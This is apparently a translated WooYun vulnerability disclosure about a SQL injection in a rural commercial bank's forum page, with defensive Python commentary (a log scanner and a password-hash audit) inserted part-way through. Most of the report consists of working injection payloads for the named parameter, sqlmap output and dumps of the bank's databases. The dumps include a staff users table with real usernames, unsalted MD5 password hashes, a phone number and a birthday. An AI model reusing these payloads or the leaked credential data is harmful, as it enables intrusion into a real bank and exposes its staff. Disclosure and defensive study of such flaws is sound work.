
Vulnerability summary

Defect ID: wooyun-2015-0140554

Title: SQL injection on the Jiyuan Rural Commercial Bank main site leaks a large amount of sensitive information (UNION supported; 7 databases, 500+ tables)

Affected vendor: jynsh.com

Author: 路人甲

Submitted: 2015-09-13 19:33

Fixed: 2015-10-30 14:02

Disclosed: 2015-10-30 14:02

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-09-13: Details sent to the vendor; awaiting vendor handling
2015-09-15: cncert (National Internet Emergency Center) has not yet been able to reach the relevant organization; details disclosed only to the reporting agency
2015-09-25: Details disclosed to core white hats and domain experts
2015-10-05: Details disclosed to regular white hats
2015-10-15: Details disclosed to intern white hats
2015-10-30: Details disclosed to the public

Summary:

Is it reasonable not to give 20 rank?

Details:

SQL injection; a large amount of database information is leaked... (admins, please mask some parts)

Proof of vulnerability:

The main site of Jiyuan Rural Commercial Bank has a SQL injection that leaks a large amount of sensitive database information. (Personally I feel your site has quite a few problems..)
Injection URL: http://**.**.**.**/bbs/boardrule.php?groupboardid=1 (the injectable parameter is groupboardid)
I manually constructed the following URL and submitted it as a test: http://**.**.**.**/bbs/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/admin/index.php
The system returned the following error, which suggested SQL injection.

[Screenshot: SQL报错.png (the SQL error message)]


Without further ado, I ran it through sqlmap, and the injection was confirmed.

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
current database: 'jynshcom'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: groupboardid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: groupboardid=1 RLIKE (SELECT (CASE WHEN (9944=9944) THEN 1 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: groupboardid=1 AND (SELECT 5588 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(5588=5588,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: groupboardid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))mIJu)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: groupboardid=1 UNION ALL SELECT CONCAT(0x71706a7071,0x415549714f4577426570,0x71707a7071)--
---
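From the defending side, the four payload shapes sqlmap reports above (the inline-comment UNION probe, the RLIKE boolean test, the SLEEP() time-based test and the FLOOR(RAND(0)*2) error-based test) are easy to pick out of web-server access logs, and the parameter itself only ever needs to be a positive integer. The following is an added Python example, not code from this report or from the bank's site: it scans constructed access-log lines (hypothetical client IPs, request lines modelled on the URLs in the report) for those patterns, and applies the strict integer check that a fixed boardrule.php would need to apply to groupboardid before the value reaches the database. The sample log lines, the indicator list and the assumption that a valid board id is a positive decimal integer are mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (hypothetical IPs; request shapes modelled on the
# manual probe and the sqlmap payloads quoted in the report). Not real log data.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Sep/2015:19:20:01 +0800] "GET /bbs/boardrule.php?groupboardid=1 HTTP/1.1" 200 5120
203.0.113.5 - - [13/Sep/2015:19:20:07 +0800] "GET /bbs/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0x41,username,0x20,password)/**/from%20dv_admin HTTP/1.1" 200 5301
203.0.113.5 - - [13/Sep/2015:19:21:15 +0800] "GET /bbs/boardrule.php?groupboardid=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20(9944=9944)%20THEN%201%20ELSE%200x28%20END)) HTTP/1.1" 200 5120
203.0.113.5 - - [13/Sep/2015:19:21:16 +0800] "GET /bbs/boardrule.php?groupboardid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))mIJu) HTTP/1.1" 200 5120
203.0.113.5 - - [13/Sep/2015:19:21:18 +0800] "GET /bbs/boardrule.php?groupboardid=1%20AND%20(SELECT%205588%20FROM(SELECT%20COUNT(*),CONCAT(0x71,(SELECT%20(ELT(5588=5588,1))),0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 1023
198.51.100.9 - - [13/Sep/2015:19:25:40 +0800] "GET /bbs/boardrule.php?groupboardid=12 HTTP/1.1" 200 5133
203.0.113.5 - - [13/Sep/2015:19:26:02 +0800] "GET /bbs/boardrule.php?groupboardid=1%20AND%201=1 HTTP/1.1" 200 5120
"""

# Request line inside a combined-format log entry.
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Indicators matching the payload families sqlmap listed for this parameter.
INDICATORS = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean-rlike", re.compile(r"\brlike\b", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("schema-probe", re.compile(r"information_schema", re.I)),
]

# Assumption: groupboardid is a positive decimal integer and nothing else.
BOARD_ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def is_valid_board_id(raw):
    """Strict allow-list check; this is the validation the fixed page would apply."""
    return BOARD_ID_RE.fullmatch(raw) is not None


def normalize(value):
    """Replace /**/ comment sequences with spaces and collapse whitespace,
    so comment-obfuscated payloads are matched the same as plain ones."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip()


def analyze_request(line):
    """Return one finding per suspicious query parameter in a single log line."""
    m = REQ_RE.search(line)
    if not m:
        return []
    client_ip = line.split(" ", 1)[0]
    query = urlsplit(m.group(1)).query
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:  # parse_qs already percent-decodes the value
            value = normalize(raw)
            hits = [label for label, rx in INDICATORS if rx.search(value)]
            valid = is_valid_board_id(raw) if name == "groupboardid" else True
            if hits or not valid:
                findings.append({"ip": client_ip, "param": name, "value": value,
                                 "valid_id": valid, "indicators": hits})
    return findings


def scan_log(text):
    """Run analyze_request over every non-empty line of an access log."""
    return [f for line in text.splitlines() if line.strip() for f in analyze_request(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']} valid_id={f['valid_id']} {f['indicators']}: {f['value'][:60]}")
```

Two of the seven sample lines pass cleanly; the other five are flagged. Note that the last line ("1 AND 1=1") matches none of the pattern indicators and is caught only by the integer allow-list, which is why the type check at the application layer, not the signature list, is the real fix.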


There are 7 databases in total.

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
available databases [7]:
[*] information_schema
[*] jynshcom
[*] mysql
[*] newbank
[*] test
[*] xznsyh
[*] ydbg


The current database is jynshcom, with 139 tables.

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: jynshcom
[139 tables]
+---------------------------+
| adl_content |
| adl_modu_auth |
| article |
| articleclass |
| auth_role |
| chatmessage |
| chatsession |
| chatuserlist |
| counter |
| counter_authitem |
| counter_browsecap |
| counter_ipaddr |
| customer |
| dayduty |
| department |
| doc_qs |
| dutygroup |
| dv_active |
| dv_activeuser |
| dv_admin |
| dv_argue |
| dv_argue_topic |
| dv_banklog |
| dv_bankstatus |
| dv_bbs1 |
| dv_bbs_ft |
| dv_bbslink |
| dv_bbsnews |
| dv_besttopic |
| dv_board |
| dv_boardpermission |
| dv_bookmark |
| dv_chanorders |
| dv_friend |
| dv_fsettings |
| dv_gather_info |
| dv_gather_url |
| dv_group_bbs1 |
| dv_group_board |
| dv_group_name |
| dv_group_topic |
| dv_group_user |
| dv_groupname |
| dv_help |
| dv_honor_list |
| dv_honor_user |
| dv_log |
| dv_message |
| dv_moneylog |
| dv_note_info |
| dv_online |
| dv_plus |
| dv_plus_tools_buss |
| dv_plus_tools_info |
| dv_plus_tools_magicface |
| dv_querycache |
| dv_savvy_integral |
| dv_savvy_topic |
| dv_savvy_wealth |
| dv_setup |
| dv_smallpaper |
| dv_space_apply_today_star |
| dv_space_keyword |
| dv_space_post |
| dv_space_skins |
| dv_space_syscat |
| dv_space_system |
| dv_space_topic |
| dv_space_upfile |
| dv_space_user |
| dv_space_usercat |
| dv_space_usersave |
| dv_styles |
| dv_sysfiles |
| dv_sysupgrade |
| dv_tablelist |
| dv_topic |
| dv_topic_ft |
| dv_upfile |
| dv_user |
| dv_useraccess |
| dv_usergroups |
| dv_vote |
| dv_voteuser |
| email |
| file |
| flink_main |
| ipjilu |
| ipname |
| mailinfo |
| mailiplog |
| menu |
| menu_deleted |
| menu_role |
| message |
| modu |
| news_manage_modu_attach |
| news_manage_modu_auth |
| news_manage_modu_class |
| news_manage_modu_content |
| online_vod_modu_attach |
| online_vod_modu_auth |
| online_vod_modu_class |
| online_vod_modu_content |
| pop_modu_auth |
| pos_apply |
| pos_handle |
| pos_img |
| public_information |
| qsh |
| roles |
| skin |
| soft |
| softtype |
| tmp |
| tmp1 |
| tsjy_sl |
| tsjy_xx |
| user_dep |
| user_modu_auth |
| users |
| users_deleted |
| users_roles |
| users_type |
| vote_answer |
| vote_modu_auth |
| vote_question |
| xedk_exp_date |
| xedk_jtcy |
| xedk_sl |
| xedk_sq |
| xedk_user |
| xedk_xx |
| xedk_zh |
| xedk_zh2 |
| xxgk |
| youqinglj |
| zhaopin_date |
| zhaopinxx |
+---------------------------+


The admin table dv_admin

Database: jynshcom
Table: dv_admin
[11 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| acceptip | varchar(255) |
| adduser | varchar(50) |
| errcount | smallint(6) |
| flag | text |
| id | int(11) unsigned |
| lastlogin | int(10) unsigned |
| lastloginip | varchar(20) |
| mysession | varchar(20) |
| password | varchar(32) |
| sessioncode | varchar(6) |
| username | varchar(50) |
+-------------+------------------+


Take a look at the users table in the jynshcom database.

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: jynshcom
Table: users
[29 entries]
+----+---------+-----------------------+---------------------+-------------+----------------+---------+---------+---------+---------+------------------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
| id | type_id | duty | name | phone | email | remark | deption | wxphone | nxphone | username | birthday | PBCaller | password | confirmed | admin_role | confirm_man | latest_access_ip | latest_access_time |
+----+---------+-----------------------+---------------------+-------------+----------------+---------+---------+---------+---------+------------------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
| 1 | 1 | ?\xed????\xb7????\xb1 | ???????\xed?\xb1 | 13523528780 | <blank> | <blank> | <blank> | <blank> | <blank> | administ | 1983-06-29 | <blank> | 7b33aa4221db6596a367b0072c4943ee | 1 | 1 | administ | **.**.**.** | 2015-09-06 16:08:29 |
| 2 | 1 | <blank> | ???????\xa7 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | anonymous | 0000-00-00 | <blank> | 665dbdbbf44d88679510e0fe3c56b511 | 1 | <blank> | administ | **.**.**.** | 2013-01-28 14:49:49 |
| 3 | 1 | <blank> | ?????? | <blank> | jynsh@**.**.**.** | <blank> | <blank> | <blank> | <blank> | xindaibu | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | <blank> | administ | **.**.**.** | 2013-01-05 07:56:59 |
| 4 | 1 | <blank> | ?\xe1???? | <blank> | jynsh@**.**.**.** | <blank> | <blank> | <blank> | <blank> | kuaijibu | 0000-00-00 | <blank> | ba0de49719930222d2347470153df6e7 | 1 | <blank> | administ | **.**.**.** | 2013-01-28 14:58:55 |
| 5 | 1 | <blank> | \xd7??????????? | <blank> | jynsh2@**.**.**.** | <blank> | <blank> | <blank> | <blank> | piaojubu | 0000-00-00 | <blank> | 665dbdbbf44d88679510e0fe3c56b511 | 1 | <blank> | administ | **.**.**.** | 2012-06-29 10:34:50 |
| 6 | 1 | <blank> | ???????? | <blank> | jynsh3@**.**.**.** | <blank> | <blank> | <blank> | <blank> | qingsuanzhongxin | 0000-00-00 | <blank> | 665dbdbbf44d88679510e0fe3c56b511 | 1 | <blank> | administ | **.**.**.** | 2012-06-29 10:40:53 |
| 7 | 1 | <blank> | ??\xd7??????? | <blank> | jynsh4@**.**.**.** | <blank> | <blank> | <blank> | <blank> | dianziyinhangbu | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | <blank> | administ | **.**.**.** | 2015-06-18 17:58:10 |
| 8 | 1 | <blank> | \xb0\xec???? | <blank> | jynsh5@**.**.**.** | <blank> | <blank> | <blank> | <blank> | bangongshi | 0000-00-00 | <blank> | 665dbdbbf44d88679510e0fe3c56b511 | 1 | <blank> | administ | **.**.**.** | 2014-04-21 17:31:40 |
| 9 | 1 | <blank> | ?????\xa4\xd7\xf7?? | <blank> | dqb@**.**.**.** | <blank> | <blank> | <blank> | <blank> | dqb | 0000-00-00 | <blank> | d199732f04302c89ebfde37149c32072 | 1 | <blank> | administ | **.**.**.** | 2013-08-08 15:09:59 |
| 10 | 1 | <blank> | lv | <blank> | hsga@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jjjcb | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 1 | administ | **.**.**.** | 2012-09-03 17:34:51 |
| 13 | 1 | <blank> | ?????? | <blank> | jynx01@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh01 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2015-09-06 17:38:48 |
| 12 | 1 | <blank> | ?????\xa7?? | <blank> | jynx02@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh02 | 0000-00-00 | <blank> | 5fd90d808cc69dcb3b9484f62711c3fc | 1 | <blank> | administ | **.**.**.** | 2015-09-10 17:40:07 |
| 14 | 1 | <blank> | \xb1\xb1?? | <blank> | jynx03@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh03 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2015-08-27 11:54:45 |
| 15 | 1 | <blank> | ?\xec?? | <blank> | jynx04@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh04 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2015-08-27 11:54:58 |
| 16 | 1 | <blank> | ???\xb0 | <blank> | jynx05@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh05 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2014-06-27 17:01:02 |
| 17 | 1 | <blank> | ???? | <blank> | jynx06@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh06 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2013-07-02 08:24:28 |
| 18 | 1 | <blank> | ???? | <blank> | jynx07@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh07 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2014-01-07 09:38:16 |
| 19 | 1 | <blank> | \xe9\xf2?? | <blank> | jynx08@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh08 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2013-06-04 16:53:00 |
| 20 | 1 | <blank> | ???\xfa?? | <blank> | jynx09@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh09 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2015-06-15 10:34:45 |
| 21 | 1 | <blank> | ???? | <blank> | jynx10@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh10 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2014-05-15 09:34:45 |
| 22 | 1 | <blank> | ???? | <blank> | jynx11@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh11 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2013-06-24 07:58:55 |
| 23 | 1 | <blank> | ???? | <blank> | jynx12@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh12 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2013-06-26 16:21:23 |
| 24 | 1 | <blank> | ?\xf3?? | <blank> | jynx13@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh13 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2014-01-09 10:22:35 |
| 25 | 1 | <blank> | ???? | <blank> | jynx19@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh19 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2013-07-26 09:20:32 |
| 26 | 1 | <blank> | ???? | <blank> | jynx14@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh14 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2013-08-05 14:31:42 |
| 27 | 1 | <blank> | ???? | <blank> | jynx18@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh18 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2015-04-07 09:38:06 |
| 28 | 1 | <blank> | ???\xb1 | <blank> | jynx15@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh15 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2014-04-14 08:34:26 |
| 29 | 1 | <blank> | ???? | <blank> | jynx16@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh16 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2015-01-29 14:17:14 |
| 30 | 1 | <blank> | ???\xb7 | <blank> | jynx17@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh17 | 0000-00-00 | <blank> | e10adc3949ba59abbe56e057f20f883e | 1 | 0 | administ | **.**.**.** | 2013-07-29 18:03:57 |
+----+---------+-----------------------+---------------------+-------------+----------------+---------+---------+---------+---------+------------------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
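The password column of the users table above is varchar(32), every value in the dump is a 32-character hex string, and the same hash recurs across several accounts (the xznsyh users table further down shows the same pattern). The following is an added Python example, not code from this report or from the bank's site: it audits such a column for unsalted fixed-length hashes and for hashes shared between accounts, and shows the salted, iterated storage (PBKDF2-HMAC-SHA256 via hashlib) that would have limited the damage of a leak like this one. The sample rows reproduce username/hash pairs from the dump above; the storage format string and the iteration count are my own convention.

```python
import hashlib
import hmac
import os
import re
from collections import Counter, defaultdict

# Constructed subset of the jynshcom users dump shown in the report
# (username, password column only; no plaintexts are involved).
SAMPLE_ROWS = [
    ("administ", "7b33aa4221db6596a367b0072c4943ee"),
    ("anonymous", "665dbdbbf44d88679510e0fe3c56b511"),
    ("xindaibu", "e10adc3949ba59abbe56e057f20f883e"),
    ("kuaijibu", "ba0de49719930222d2347470153df6e7"),
    ("piaojubu", "665dbdbbf44d88679510e0fe3c56b511"),
    ("qingsuanzhongxin", "665dbdbbf44d88679510e0fe3c56b511"),
    ("dianziyinhangbu", "e10adc3949ba59abbe56e057f20f883e"),
    ("jynsh01", "e10adc3949ba59abbe56e057f20f883e"),
    ("jynsh02", "5fd90d808cc69dcb3b9484f62711c3fc"),
    ("jynsh03", "e10adc3949ba59abbe56e057f20f883e"),
]

MD5_LIKE = re.compile(r"[0-9a-fA-F]{32}")
PBKDF2_PREFIX = "pbkdf2_sha256$"  # storage convention used by hash_password() (my own)


def classify_hash(stored):
    """Classify a stored password value by its shape."""
    if stored.startswith(PBKDF2_PREFIX):
        return "pbkdf2-sha256"
    if MD5_LIKE.fullmatch(stored):
        # 32 hex chars and nothing else: an unsalted, fast hash that an attacker
        # holding the dump can attack offline, and identical across accounts
        # that chose the same password.
        return "md5-like"
    return "other"


def audit_password_column(rows):
    """Summarise storage weakness and credential reuse over (username, hash) rows."""
    kinds = Counter(classify_hash(h) for _, h in rows)
    by_hash = defaultdict(list)
    for user, h in rows:
        by_hash[h.lower()].append(user)
    shared = {h: users for h, users in by_hash.items() if len(users) > 1}
    return {
        "rows": len(rows),
        "md5_like": kinds["md5-like"],
        "shared": shared,                       # hash -> accounts storing it
        "accounts_sharing": sum(len(u) for u in shared.values()),
    }


def hash_password(password, iterations=600_000):
    """Salted, iterated hash: a leaked value is per-account and slow to attack."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{PBKDF2_PREFIX}{iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt/iterations and compare in constant time."""
    try:
        _, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    report = audit_password_column(SAMPLE_ROWS)
    print(f"{report['md5_like']}/{report['rows']} rows are unsalted 32-hex hashes")
    for h, users in report["shared"].items():
        print(f"hash {h[:8]}... shared by {len(users)} accounts: {', '.join(users)}")
```

Running the audit over the sample rows reports every row as an unsalted 32-hex hash and two hash values shared by seven accounts between them; a column holding the PBKDF2 format above would need to be widened well beyond varchar(32), and identical passwords would no longer produce identical stored values.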


newbank contains 102 tables; it presumably holds customers' bank account information, so I did not dump it.

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: newbank
[102 tables]
+--------------------------------+
| c_courtjudgment |
| c_courtlawsuitcpt |
| c_courtrefereeinfo |
| c_gschangeinfo |
| comp_receivables |
| corp_control |
| corp_glc |
| corp_qygd |
| cr_annex |
| cr_corp_inf |
| cr_family |
| cr_farm |
| cr_goods |
| cr_jtsz |
| cr_per_car |
| cr_per_house |
| cr_per_loan |
| cr_pers_inv |
| cr_pers_prod |
| cr_personinfo |
| cr_zc |
| crm_contactlog |
| crm_customerinfo |
| crm_history |
| crm_hmd |
| errormsginfo |
| hpbaseelement |
| hpbaselayout |
| hpelement |
| hpextelement |
| hpfieldelement |
| hpinfo |
| hpsqlelement |
| hpstyle |
| hpwhereelement |
| hrmcity |
| hrmcompany |
| hrmcountry |
| hrmdepartment |
| hrmpassword |
| hrmperformancealert |
| hrmperformancealertcheck |
| hrmperformanceappendrule |
| hrmperformanceappendruletarget |
| hrmperformancebeforepoint |
| hrmperformancecheckdetail |
| hrmperformancecheckflow |
| hrmperformancecheckpoint |
| hrmperformancecheckpointdetail |
| hrmperformancecheckrule |
| hrmperformancecheckscheme |
| hrmperformancecheckstd |
| hrmperformancecustom |
| hrmperformancediycheckpoint |
| hrmperformanceflow |
| hrmperformancegoal |
| hrmperformancegoalshare |
| hrmperformancegoalstd |
| hrmperformancegrade |
| hrmperformancegradedetail |
| hrmperformancenodepoint |
| hrmperformanceplancheck |
| hrmperformanceplandown |
| hrmperformanceplaneffort |
| hrmperformanceplaneffortmodul |
| hrmperformanceplankey |
| hrmperformanceplankeymodul |
| hrmperformanceplankind |
| hrmperformanceplankinddetail |
| hrmperformanceplanmodul |
| hrmperformancepointadjust |
| hrmperformancepointrule |
| hrmperformancereport |
| hrmperformancereportlog |
| hrmperformanceschemecontent |
| hrmperformanceschemedetail |
| hrmperformanceschemepercent |
| hrmperformancetargetdetail |
| hrmperformancetargetstd |
| hrmperformancetargettype |
| hrmprovince |
| hrmresource |
| hrmresourcemanager |
| hrmsubcompany |
| htmllabelinfo |
| htmlnoteinfo |
| imagefile |
| license |
| mailsendmain |
| mailsendrecord |
| sms |
| sysmaintenancelog |
| syspoppupinfo |
| syspoppupremindinfonew |
| syspopremindinfo |
| system_skin |
| systemset |
| voting |
| workflow_currentoperator |
| workflow_requestbase |
| workplan |
| workplanupdate |
+--------------------------------+


ydbg contains 87 tables

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: ydbg
[87 tables]
+-----------------------------+
| dhmi_config |
| ema_license_log |
| mdp_extention |
| mdp_logs |
| mip_adminmailconfig |
| mip_app_config |
| mip_app_period |
| mip_app_sections |
| mip_batchcert_info |
| mip_branch |
| mip_business_admin |
| mip_business_area |
| mip_business_data |
| mip_cert_info |
| mip_client_app |
| mip_config |
| mip_custom_catalog |
| mip_custom_sysuser |
| mip_domain |
| mip_domain_app |
| mip_domain_statistics |
| mip_dps_config |
| mip_dpsnotsupport_file |
| mip_enterprise_gateway |
| mip_enterpriseadmin |
| mip_enterpriseconfig |
| mip_enterprisemailconfig |
| mip_enterprisemailcontrol |
| mip_extendcode |
| mip_file_type |
| mip_group |
| mip_group_contact |
| mip_group_user |
| mip_keyfilter |
| mip_ldap |
| mip_ldap_reflect |
| mip_logs |
| mip_mail |
| mip_mail_logs |
| mip_mailconfig |
| mip_map_data |
| mip_message |
| mip_mmsconfig |
| mip_mmsdata |
| mip_mobiletype |
| mip_packet |
| mip_personal_group |
| mip_personal_user |
| mip_personal_user_extend |
| mip_plugin_app |
| mip_pushrule_blocklist |
| mip_pushrule_filter |
| mip_pushrule_time |
| mip_pushrule_trustlist |
| mip_relation_custom_catalog |
| mip_role |
| mip_role_permission |
| mip_router |
| mip_sections |
| mip_sms_usagecount |
| mip_smsconfig |
| mip_smsdata |
| mip_syslog |
| mip_system_mornitor |
| mip_sysuser |
| mip_sysuser_extend |
| mip_upgrade |
| mip_upgrade_require |
| mip_upload_file |
| mip_user_ctr |
| mip_user_deviceinfo |
| mip_user_extention |
| mip_user_login |
| mip_user_mobiletype |
| mip_user_phoneinfo |
| mip_user_privacy |
| mip_user_pushrule |
| mip_user_role |
| mip_user_statistics |
| mip_userofapp |
| mip_useronline_statistic |
| mip_visit_log |
| mip_wapconfig |
| mip_wappushurl |
| mip_white_black |
| mip_whitelist |
| mip_whitelist_config |
+-----------------------------+


xznsyh contains 130 tables

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: xznsyh
[130 tables]
+---------------------------+
| adl_content |
| adl_modu_auth |
| article |
| articleclass |
| auth_role |
| chatmessage |
| chatsession |
| chatuserlist |
| counter |
| counter_authitem |
| counter_browsecap |
| counter_ipaddr |
| customer |
| dayduty |
| doc_qs |
| dutygroup |
| dv_active |
| dv_activeuser |
| dv_admin |
| dv_argue |
| dv_argue_topic |
| dv_banklog |
| dv_bankstatus |
| dv_bbs1 |
| dv_bbs_ft |
| dv_bbslink |
| dv_bbsnews |
| dv_besttopic |
| dv_board |
| dv_boardpermission |
| dv_bookmark |
| dv_chanorders |
| dv_friend |
| dv_fsettings |
| dv_gather_info |
| dv_gather_url |
| dv_group_bbs1 |
| dv_group_board |
| dv_group_name |
| dv_group_topic |
| dv_group_user |
| dv_groupname |
| dv_help |
| dv_honor_list |
| dv_honor_user |
| dv_log |
| dv_message |
| dv_moneylog |
| dv_note_info |
| dv_online |
| dv_plus |
| dv_plus_tools_buss |
| dv_plus_tools_info |
| dv_plus_tools_magicface |
| dv_querycache |
| dv_savvy_integral |
| dv_savvy_topic |
| dv_savvy_wealth |
| dv_setup |
| dv_smallpaper |
| dv_space_apply_today_star |
| dv_space_keyword |
| dv_space_post |
| dv_space_skins |
| dv_space_syscat |
| dv_space_system |
| dv_space_topic |
| dv_space_upfile |
| dv_space_user |
| dv_space_usercat |
| dv_space_usersave |
| dv_styles |
| dv_sysfiles |
| dv_sysupgrade |
| dv_tablelist |
| dv_topic |
| dv_topic_ft |
| dv_upfile |
| dv_user |
| dv_useraccess |
| dv_usergroups |
| dv_vote |
| dv_voteuser |
| email |
| file |
| flink_main |
| ipname |
| menu |
| menu_deleted |
| menu_role |
| message |
| modu |
| news_manage_modu_attach |
| news_manage_modu_auth |
| news_manage_modu_class |
| news_manage_modu_content |
| online_vod_modu_attach |
| online_vod_modu_auth |
| online_vod_modu_class |
| online_vod_modu_content |
| pop_modu_auth |
| public_information |
| roles |
| skin |
| soft |
| softtype |
| tmp |
| tmp1 |
| tsjy_sl |
| tsjy_xx |
| user_modu_auth |
| users |
| users_deleted |
| users_roles |
| users_type |
| vote_answer |
| vote_modu_auth |
| vote_question |
| xedk_exp_date |
| xedk_jtcy |
| xedk_sl |
| xedk_sq |
| xedk_user |
| xedk_xx |
| xedk_zh |
| xedk_zh2 |
| xxgk |
| youqinglj |
| zhaopin_date |
| zhaopinxx |
+---------------------------+


A quick look at the users table in xznsyh

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: xznsyh
Table: users
[5 entries]
+----+---------+--------------+------------+-------------+-------------------+---------+---------+---------+---------+-----------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
